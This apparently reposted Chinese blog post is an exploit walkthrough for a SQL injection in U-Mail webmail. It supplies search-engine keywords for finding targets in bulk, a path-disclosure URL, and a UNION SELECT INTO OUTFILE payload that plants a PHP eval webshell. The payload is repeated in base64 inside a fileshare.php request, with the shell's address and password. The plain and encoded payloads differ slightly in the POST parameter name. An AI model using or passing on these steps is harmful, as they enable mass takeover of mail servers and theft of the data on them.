u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。
1、Baidu & Google Keywords:
————————————————————-
Power by U-Mail *
精准反垃圾,有效过滤超过98.6%的垃圾邮件 *
病毒邮件有效拦截率超过99.9%; *
*
等等…自由构造! *
————————————————————-
2、漏洞利用:
要想写入shell必须知道其物理路径对吧,可通过此方法获取物理路径,当然这只是鸡肋爆路径,大家还可以继续研究:
http://xxx.com/webmail/userapply.php?execadd=333&DomainID=111
得到物理路径:E:\umail\WorldClient\html\userapply.php
注入webshell代码:
aa' union select 1,2,3,4,5,6,'<?php eval($_POST[1]);?>',8,9,10,11,12,13,14 into outfile 'E:/umail/WorldClient/html/08sec.php'#
(将代码中的路径改成报错获取的物理路径),然后将其base64加密一下,记得路径是“/”,而不是”\”
得到:
YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==
然后访问…..
http://xxx.com/<strong>webmail/fileshare.php?file=</strong>YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==
这样就将shell写进了web目录中,shell地址:http://xxx.com/webmail/08sec.php password:shell
本文隐藏内容 登陆 后才可以浏览
参考资料:
1、u-mail注入导致任意代码执行漏洞 http://www.wooyun.org/bugs/wooyun-2013-043493
2、U-Mail注入之任意代码写入 http://www.2cto.com/Article/201401/272278.html
3、大部分网站政府网站U-mail存在直接拿shell漏洞 http://www.wooyun.org/bugs/wooyun-2010-049525
转载请注明:jinglingshu的博客 » u-mail注入导致任意代码执行漏洞